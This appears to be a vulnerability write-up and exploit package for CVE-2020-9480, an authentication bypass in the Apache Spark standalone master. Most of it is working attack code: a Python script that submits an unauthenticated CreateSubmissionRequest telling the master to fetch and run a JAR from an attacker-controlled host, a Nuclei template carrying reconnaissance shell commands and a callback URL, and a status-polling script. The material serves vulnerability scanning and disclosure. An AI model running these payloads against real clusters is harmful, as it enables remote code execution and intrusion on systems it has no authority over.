In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc.).
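The crafted RPC in question is an unauthenticated CreateSubmissionRequest posted to the standalone master's REST submission endpoint (/v1/submissions/create, port 6066 by default), which causes the master to fetch and launch an attacker-supplied JAR. As a rough illustration, a minimal Python sketch of such a request follows; the target host, the hosted JAR URL, and the Exploit main class name are placeholder assumptions for this sketch, not values from a real deployment or from the PoC below.

# Minimal sketch of a CreateSubmissionRequest against the Spark standalone
# REST submission endpoint (port 6066). Host, JAR URL, and main class are
# placeholder assumptions for illustration only.
import json
import urllib.request

MASTER = "target.example.com"                      # assumed target host
JAR_URL = "http://attacker.example/exploit.jar"    # assumed attacker-hosted JAR

payload = {
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": ["whoami"],
    "appResource": JAR_URL,
    "environmentVariables": {"SPARK_ENV_LOADED": "1"},
    "mainClass": "Exploit",
    "sparkProperties": {
        "spark.jars": JAR_URL,
        "spark.driver.supervise": "false",
        "spark.app.name": "Exploit",
        "spark.submit.deployMode": "cluster",
        "spark.master": f"spark://{MASTER}:6066",
    },
}

req = urllib.request.Request(
    f"http://{MASTER}:6066/v1/submissions/create",
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
with urllib.request.urlopen(req, timeout=10) as resp:
    body = json.loads(resp.read().decode())
    # A CreateSubmissionResponse containing a submissionId indicates the
    # master accepted the submission without the shared secret.
    print(body.get("success"), body.get("submissionId"))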
PoC code [publicly available]
id: CVE-2020-9480
info:
name: Apache Spark - Authentication Bypass
author: riteshs4hu
severity: critical
description: |
In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).
reference:
- https://github.com/XiaoShaYu617/CVE-2020-9480/blob/main/20220624_apache_spark_apache_spark_pre-auth_code_execution_cve-2020-9480.py
- https://nvd.nist.gov/vuln/detail/cve-2020-9480
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9480
epss-score: 0.933
epss-percentile: 0.99796
cwe-id: CWE-306
metadata:
verified: true
max-request: 1
vendor: apache
product: spark
fofa-query: port="6066" && banner="Spark Master"
tags: cve,cve2020,apache,spark,auth-bypass,vkev,vuln
variables:
url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar"
http:
- raw:
- |
POST /v1/submissions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{
"action": "CreateSubmissionRequest",
"clientSparkVersion": "2.3.1",
"appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
"appResource": "{{url}}",
"environmentVariables": {"SPARK_ENV_LOADED":"1"},
"mainClass": "Exploit",
"sparkProperties": {
"spark.jars": "{{url}}",
"spark.driver.supervise": "false",
"spark.app.name": "Exploit",
"spark.eventLog.enabled": "true",
"spark.submit.deployMode": "cluster",
"spark.master": "spark://{{Hostname}}:6066"
}
}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(interactsh_protocol, 'http')"
- 'contains(body, "CreateSubmissionResponse")'
- 'contains_any(body, "submissionId", "driverState")'
condition: and
extractors:
- type: regex
name: submission-id
regex:
- '"submissionId"\s*:\s*"([^"]+)"'
- '"driverState"\s*:\s*"([^"]+)"'
# digest: 4b0a00483046022100df6e7931fb479705d449a6552bec498ffff8cbcfdfc1fb06be4ace6dc10ffe2c0221008adb4be64d95a5c8ae4c8635322bd762906829e661b011ab2d088815f010f7b0:922c64590222798bb761d5b6d8e72950
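If the submission is accepted, the extracted submissionId can also be used to query the state of the launched driver through the same standalone REST submission API. A small sketch is given below; the host and submission ID are placeholders, and the /v1/submissions/status/<id> route is the status endpoint of Spark's standalone REST API.

# Sketch: poll the standalone REST API for the state of a submitted driver.
# MASTER and submission_id are placeholder assumptions for illustration.
import json
import urllib.request

MASTER = "target.example.com"                   # assumed target host
submission_id = "driver-00000000000000-0000"    # ID extracted from the create response

url = f"http://{MASTER}:6066/v1/submissions/status/{submission_id}"
with urllib.request.urlopen(url, timeout=10) as resp:
    status = json.loads(resp.read().decode())
    # driverState moves through SUBMITTED/RUNNING/FINISHED as the master
    # schedules and runs the submitted application.
    print(status.get("driverState"), status.get("success"))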